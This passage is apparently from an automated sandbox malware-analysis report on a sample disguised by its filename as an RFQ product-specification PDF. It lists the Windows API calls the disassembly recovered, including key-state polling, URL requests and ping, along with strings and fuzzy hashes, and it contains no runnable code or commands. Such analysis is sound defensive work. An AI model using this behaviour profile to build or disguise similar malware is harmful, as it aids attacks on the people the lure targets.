                                                                                                                • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00AC3FC4
                                                                                                                • VariantClear.OLEAUT32(?), ref: 00AC3FD8
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
                                                                                                                • String ID:
                                                                                                                • API String ID: 429561992-0
                                                                                                                APIs
                                                                                                                • CoInitialize.OLE32(00000000), ref: 00AB7AF3
                                                                                                                • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00AB7B8F
                                                                                                                • SHGetDesktopFolder.SHELL32(?), ref: 00AB7BA3
                                                                                                                • CoCreateInstance.OLE32(00ADFD08,00000000,00000001,00B06E6C,?), ref: 00AB7BEF
                                                                                                                • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00AB7C74
                                                                                                                • CoTaskMemFree.OLE32(?,?), ref: 00AB7CCC
                                                                                                                • SHBrowseForFolderW.SHELL32(?), ref: 00AB7D57
                                                                                                                • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00AB7D7A
                                                                                                                • CoTaskMemFree.OLE32(00000000), ref: 00AB7D81
                                                                                                                • CoTaskMemFree.OLE32(00000000), ref: 00AB7DD6
                                                                                                                • CoUninitialize.OLE32 ref: 00AB7DDC
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
                                                                                                                • String ID:
                                                                                                                • API String ID: 2762341140-0
                                                                                                                APIs
                                                                                                                • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00AD5504
                                                                                                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00AD5515
                                                                                                                • CharNextW.USER32(00000158), ref: 00AD5544
                                                                                                                • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00AD5585
                                                                                                                • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00AD559B
                                                                                                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00AD55AC
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$CharNext
                                                                                                                • String ID:
                                                                                                                • API String ID: 1350042424-0
                                                                                                                APIs
                                                                                                                • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00A9FAAF
                                                                                                                • SafeArrayAllocData.OLEAUT32(?), ref: 00A9FB08
                                                                                                                • VariantInit.OLEAUT32(?), ref: 00A9FB1A
                                                                                                                • SafeArrayAccessData.OLEAUT32(?,?), ref: 00A9FB3A
                                                                                                                • VariantCopy.OLEAUT32(?,?), ref: 00A9FB8D
                                                                                                                • SafeArrayUnaccessData.OLEAUT32(?), ref: 00A9FBA1
                                                                                                                • VariantClear.OLEAUT32(?), ref: 00A9FBB6
                                                                                                                • SafeArrayDestroyData.OLEAUT32(?), ref: 00A9FBC3
                                                                                                                • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00A9FBCC
                                                                                                                • VariantClear.OLEAUT32(?), ref: 00A9FBDE
                                                                                                                • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00A9FBE9
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                                                                • String ID:
                                                                                                                • API String ID: 2706829360-0
                                                                                                                APIs
                                                                                                                • GetKeyboardState.USER32(?), ref: 00AA9CA1
                                                                                                                • GetAsyncKeyState.USER32(000000A0), ref: 00AA9D22
                                                                                                                • GetKeyState.USER32(000000A0), ref: 00AA9D3D
                                                                                                                • GetAsyncKeyState.USER32(000000A1), ref: 00AA9D57
                                                                                                                • GetKeyState.USER32(000000A1), ref: 00AA9D6C
                                                                                                                • GetAsyncKeyState.USER32(00000011), ref: 00AA9D84
                                                                                                                • GetKeyState.USER32(00000011), ref: 00AA9D96
                                                                                                                • GetAsyncKeyState.USER32(00000012), ref: 00AA9DAE
                                                                                                                • GetKeyState.USER32(00000012), ref: 00AA9DC0
                                                                                                                • GetAsyncKeyState.USER32(0000005B), ref: 00AA9DD8
                                                                                                                • GetKeyState.USER32(0000005B), ref: 00AA9DEA
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID: State$Async$Keyboard
                                                                                                                • String ID:
                                                                                                                • API String ID: 541375521-0
                                                                                                                APIs
                                                                                                                • WSAStartup.WSOCK32(00000101,?), ref: 00AC05BC
                                                                                                                • inet_addr.WSOCK32(?), ref: 00AC061C
                                                                                                                • gethostbyname.WSOCK32(?), ref: 00AC0628
                                                                                                                • IcmpCreateFile.IPHLPAPI ref: 00AC0636
                                                                                                                • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00AC06C6
                                                                                                                • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00AC06E5
                                                                                                                • IcmpCloseHandle.IPHLPAPI(?), ref: 00AC07B9
                                                                                                                • WSACleanup.WSOCK32 ref: 00AC07BF
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                                                                • String ID: Ping
                                                                                                                • API String ID: 1028309954-2246546115
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Similarity
                                                                                                                • API ID: _wcslen$BuffCharLower
                                                                                                                • String ID: cdecl$none$stdcall$winapi
                                                                                                                • API String ID: 707087890-567219261
                                                                                                                APIs
                                                                                                                • CoInitialize.OLE32 ref: 00AC3774
                                                                                                                • CoUninitialize.OLE32 ref: 00AC377F
                                                                                                                • CoCreateInstance.OLE32(?,00000000,00000017,00ADFB78,?), ref: 00AC37D9
                                                                                                                • IIDFromString.OLE32(?,?), ref: 00AC384C
                                                                                                                • VariantInit.OLEAUT32(?), ref: 00AC38E4
                                                                                                                • VariantClear.OLEAUT32(?), ref: 00AC3936
                                                                                                                Strings
                                                                                                                Similarity
                                                                                                                • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
                                                                                                                • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                                                                • API String ID: 636576611-1287834457
                                                                                                                APIs
                                                                                                                • LoadStringW.USER32(00000066,?,00000FFF,?), ref: 00AB33CF
                                                                                                                  • Part of subcall function 00A49CB3: _wcslen.LIBCMT ref: 00A49CBD
                                                                                                                • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 00AB33F0
                                                                                                                Strings
                                                                                                                Similarity
                                                                                                                • API ID: LoadString$_wcslen
                                                                                                                • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                                                                                                                • API String ID: 4099089115-3080491070
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Similarity
                                                                                                                • API ID: _wcslen$BuffCharUpper
                                                                                                                • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                                                                                • API String ID: 1256254125-769500911
                                                                                                                APIs
                                                                                                                • SetErrorMode.KERNEL32(00000001), ref: 00AB53A0
                                                                                                                • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00AB5416
                                                                                                                • GetLastError.KERNEL32 ref: 00AB5420
                                                                                                                • SetErrorMode.KERNEL32(00000000,READY), ref: 00AB54A7
                                                                                                                Strings
                                                                                                                Similarity
                                                                                                                • API ID: Error$Mode$DiskFreeLastSpace
                                                                                                                • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                                                                • API String ID: 4194297153-14809454
                                                                                                                APIs
                                                                                                                • CreateMenu.USER32 ref: 00AD3C79
                                                                                                                • SetMenu.USER32(?,00000000), ref: 00AD3C88
                                                                                                                • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00AD3D10
                                                                                                                • IsMenu.USER32(?), ref: 00AD3D24
                                                                                                                • CreatePopupMenu.USER32 ref: 00AD3D2E
                                                                                                                • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00AD3D5B
                                                                                                                • DrawMenuBar.USER32 ref: 00AD3D63
                                                                                                                Strings
                                                                                                                Similarity
                                                                                                                • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                                                                                                • String ID: 0$F
                                                                                                                • API String ID: 161812096-3044882817
                                                                                                                APIs
                                                                                                                • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00AD3A9D
                                                                                                                • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00AD3AA0
                                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00AD3AC7
                                                                                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00AD3AEA
                                                                                                                • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00AD3B62
                                                                                                                • SendMessageW.USER32(?,00001074,00000000,00000007), ref: 00AD3BAC
                                                                                                                • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 00AD3BC7
                                                                                                                • SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 00AD3BE2
                                                                                                                • SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 00AD3BF6
                                                                                                                • SendMessageW.USER32(?,00001008,00000000,00000007), ref: 00AD3C13
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$LongWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 312131281-0
                                                                                                                • Opcode ID: 07a1ae7938cfdfda570341c9308fdd95370032687e319ded716a3f7edaec9cf7
                                                                                                                • Instruction ID: 715c86a78dff33a5c94cef0c5d59bc5324a68a8e0a3c867da859389694864173
                                                                                                                • Opcode Fuzzy Hash: 07a1ae7938cfdfda570341c9308fdd95370032687e319ded716a3f7edaec9cf7
                                                                                                                • Instruction Fuzzy Hash: 7F616C75900208AFDB10DFA8CD81EEE77B8EB09710F10459AFA16E73A1D774AE46DB50
                                                                                                                APIs
                                                                                                                • _free.LIBCMT ref: 00A72C94
                                                                                                                  • Part of subcall function 00A729C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00A7D7D1,00000000,00000000,00000000,00000000,?,00A7D7F8,00000000,00000007,00000000,?,00A7DBF5,00000000), ref: 00A729DE
                                                                                                                  • Part of subcall function 00A729C8: GetLastError.KERNEL32(00000000,?,00A7D7D1,00000000,00000000,00000000,00000000,?,00A7D7F8,00000000,00000007,00000000,?,00A7DBF5,00000000,00000000), ref: 00A729F0
                                                                                                                • _free.LIBCMT ref: 00A72CA0
                                                                                                                • _free.LIBCMT ref: 00A72CAB
                                                                                                                • _free.LIBCMT ref: 00A72CB6
                                                                                                                • _free.LIBCMT ref: 00A72CC1
                                                                                                                • _free.LIBCMT ref: 00A72CCC
                                                                                                                • _free.LIBCMT ref: 00A72CD7
                                                                                                                • _free.LIBCMT ref: 00A72CE2
                                                                                                                • _free.LIBCMT ref: 00A72CED
                                                                                                                • _free.LIBCMT ref: 00A72CFB
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                                                • String ID:
                                                                                                                • API String ID: 776569668-0
                                                                                                                • Opcode ID: e089698d2a2b3c82ffab1c6702fcb1879f67d7d1d34c59c7a38c96b477856d43
                                                                                                                • Instruction ID: b6c0818846e2102314d3ba6351d83e02f3cd3ac2e007ec7f26a6202d284749e7
                                                                                                                • Opcode Fuzzy Hash: e089698d2a2b3c82ffab1c6702fcb1879f67d7d1d34c59c7a38c96b477856d43
                                                                                                                • Instruction Fuzzy Hash: 82119676100108AFCB02EF64DE42EDD7BA5FF45350F45C4A5FA4C5B222D631EE909B90
                                                                                                                APIs
                                                                                                                • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00A41459
                                                                                                                • OleUninitialize.OLE32(?,00000000), ref: 00A414F8
                                                                                                                • UnregisterHotKey.USER32(?), ref: 00A416DD
                                                                                                                • DestroyWindow.USER32(?), ref: 00A824B9
                                                                                                                • FreeLibrary.KERNEL32(?), ref: 00A8251E
                                                                                                                • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00A8254B
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                                                                • String ID: close all
                                                                                                                • API String ID: 469580280-3243417748
                                                                                                                • Opcode ID: 99369bd4e1c652d8c9e8c5adac8c6370fd8dfe45535962d7df663873b4dd586b
                                                                                                                • Instruction ID: b21ec80b9829630dcc374f9cecc26e328c1c45993c3ca598a5b1d58e34d80340
                                                                                                                • Opcode Fuzzy Hash: 99369bd4e1c652d8c9e8c5adac8c6370fd8dfe45535962d7df663873b4dd586b
                                                                                                                • Instruction Fuzzy Hash: 0DD19C35702212CFCB29EF14C999B69F7A4BF85710F1442ADE84A6B252DB30ED52CF91
                                                                                                                APIs
                                                                                                                • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00AB7FAD
                                                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00AB7FC1
                                                                                                                • GetFileAttributesW.KERNEL32(?), ref: 00AB7FEB
                                                                                                                • SetFileAttributesW.KERNEL32(?,00000000), ref: 00AB8005
                                                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00AB8017
                                                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00AB8060
                                                                                                                • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00AB80B0
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CurrentDirectory$AttributesFile
                                                                                                                • String ID: *.*
                                                                                                                • API String ID: 769691225-438819550
                                                                                                                • Opcode ID: 6d94e2cdd52971cbb73720c18b01769efb0127b86634b18a0fbac76a36fab194
                                                                                                                • Instruction ID: eebf7f2669d053f48c4fe082c7239ba5ac858bfdb154fdb6400f33d481bb198d
                                                                                                                • Opcode Fuzzy Hash: 6d94e2cdd52971cbb73720c18b01769efb0127b86634b18a0fbac76a36fab194
                                                                                                                • Instruction Fuzzy Hash: CA818D725082419BCB20EF14C944AEEB3ECBFC8350F54485AF885DB252EBB5DD49CB52
                                                                                                                APIs
                                                                                                                • SetWindowLongW.USER32(?,000000EB), ref: 00A45C7A
                                                                                                                  • Part of subcall function 00A45D0A: GetClientRect.USER32(?,?), ref: 00A45D30
                                                                                                                  • Part of subcall function 00A45D0A: GetWindowRect.USER32(?,?), ref: 00A45D71
                                                                                                                  • Part of subcall function 00A45D0A: ScreenToClient.USER32(?,?), ref: 00A45D99
                                                                                                                • GetDC.USER32 ref: 00A846F5
                                                                                                                • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00A84708
                                                                                                                • SelectObject.GDI32(00000000,00000000), ref: 00A84716
                                                                                                                • SelectObject.GDI32(00000000,00000000), ref: 00A8472B
                                                                                                                • ReleaseDC.USER32(?,00000000), ref: 00A84733
                                                                                                                • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00A847C4
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                                                                • String ID: U
                                                                                                                • API String ID: 4009187628-3372436214
                                                                                                                • Opcode ID: c427409dbe434efd4a3400b1564b39440a39abb861618bf781ff6589e845f634
                                                                                                                • Instruction ID: 92a14deaf4ddd44663784bba92e99bdd48928b4a7a23e9b2e9d77ff3c7f01a2d
                                                                                                                • Opcode Fuzzy Hash: c427409dbe434efd4a3400b1564b39440a39abb861618bf781ff6589e845f634
                                                                                                                • Instruction Fuzzy Hash: B271F134800206DFCF21EF64C984AFA7BB5FF8A360F14426AED565A2A6D7318C41DF50
                                                                                                                APIs
                                                                                                                • LoadStringW.USER32(00000066,?,00000FFF,00000000), ref: 00AB35E4
                                                                                                                  • Part of subcall function 00A49CB3: _wcslen.LIBCMT ref: 00A49CBD
                                                                                                                • LoadStringW.USER32(00B12390,?,00000FFF,?), ref: 00AB360A
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: LoadString$_wcslen
                                                                                                                • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                                                • API String ID: 4099089115-2391861430
                                                                                                                • Opcode ID: 2140b37e008e72367cfde933bf0e41e81a479274f05b56c020befbef2b6f53b2
                                                                                                                • Instruction ID: 3f054136639698523284b30719e7aec47453849460f65d5e0d9f5e81b1699287
                                                                                                                • Opcode Fuzzy Hash: 2140b37e008e72367cfde933bf0e41e81a479274f05b56c020befbef2b6f53b2
                                                                                                                • Instruction Fuzzy Hash: 00518F72800209BADF14EFA0DE42EEEBB78AF45300F544165F505761A2EB302B99DFA1
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00A59BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00A59BB2
                                                                                                                  • Part of subcall function 00A5912D: GetCursorPos.USER32(?), ref: 00A59141
                                                                                                                  • Part of subcall function 00A5912D: ScreenToClient.USER32(00000000,?), ref: 00A5915E
                                                                                                                  • Part of subcall function 00A5912D: GetAsyncKeyState.USER32(00000001), ref: 00A59183
                                                                                                                  • Part of subcall function 00A5912D: GetAsyncKeyState.USER32(00000002), ref: 00A5919D
                                                                                                                • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?,?,?), ref: 00AD8B6B
                                                                                                                • ImageList_EndDrag.COMCTL32 ref: 00AD8B71
                                                                                                                • ReleaseCapture.USER32 ref: 00AD8B77
                                                                                                                • SetWindowTextW.USER32(?,00000000), ref: 00AD8C12
                                                                                                                • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00AD8C25
                                                                                                                • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?,?,?), ref: 00AD8CFF
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                                                                                                • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                                                                                • API String ID: 1924731296-2107944366
                                                                                                                • Opcode ID: 8b033d1923ee0d4a69ebaa6e8edc808610415188eabd5d85ce9fbf2389b96afa
                                                                                                                • Instruction ID: eceea0b21b439f508dc3876c59e7dc6930f4624da4ef3c3a9c1209c0681bce6d
                                                                                                                • Opcode Fuzzy Hash: 8b033d1923ee0d4a69ebaa6e8edc808610415188eabd5d85ce9fbf2389b96afa
                                                                                                                • Instruction Fuzzy Hash: 9A518B75105300AFD700DF24DD96FAA77E4FB88750F400A2EF956972E2DB74A905CB62
                                                                                                                APIs
                                                                                                                • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00ABC272
                                                                                                                • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00ABC29A
                                                                                                                • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00ABC2CA
                                                                                                                • GetLastError.KERNEL32 ref: 00ABC322
                                                                                                                • SetEvent.KERNEL32(?), ref: 00ABC336
                                                                                                                • InternetCloseHandle.WININET(00000000), ref: 00ABC341
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                                                                                • String ID:
                                                                                                                • API String ID: 3113390036-3916222277
                                                                                                                APIs
                                                                                                                • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00A83AAF,?,?,Bad directive syntax error,00ADCC08,00000000,00000010,?,?,>>>AUTOIT SCRIPT<<<), ref: 00AA98BC
                                                                                                                • LoadStringW.USER32(00000000,?,00A83AAF,?), ref: 00AA98C3
                                                                                                                  • Part of subcall function 00A49CB3: _wcslen.LIBCMT ref: 00A49CBD
                                                                                                                • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00AA9987
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID: HandleLoadMessageModuleString_wcslen
                                                                                                                • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                                                                • API String ID: 858772685-4153970271
                                                                                                                APIs
                                                                                                                • GetParent.USER32 ref: 00AA20AB
                                                                                                                • GetClassNameW.USER32(00000000,?,00000100), ref: 00AA20C0
                                                                                                                • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00AA214D
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID: ClassMessageNameParentSend
                                                                                                                • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                                                                • API String ID: 1290815626-3381328864
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID: _free$EnvironmentVariable___from_strstr_to_strchr
                                                                                                                • String ID:
                                                                                                                • API String ID: 1282221369-0
                                                                                                                APIs
                                                                                                                • SendMessageW.USER32(?,00002001,00000000,00000000), ref: 00AD5186
                                                                                                                • ShowWindow.USER32(?,00000000), ref: 00AD51C7
                                                                                                                • ShowWindow.USER32(?,00000005,?,00000000), ref: 00AD51CD
                                                                                                                • SetFocus.USER32(?,?,00000005,?,00000000), ref: 00AD51D1
                                                                                                                  • Part of subcall function 00AD6FBA: DeleteObject.GDI32(00000000), ref: 00AD6FE6
                                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00AD520D
                                                                                                                • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00AD521A
                                                                                                                • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00AD524D
                                                                                                                • SendMessageW.USER32(?,00001001,00000000,000000FE), ref: 00AD5287
                                                                                                                • SendMessageW.USER32(?,00001026,00000000,000000FE), ref: 00AD5296
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                Similarity
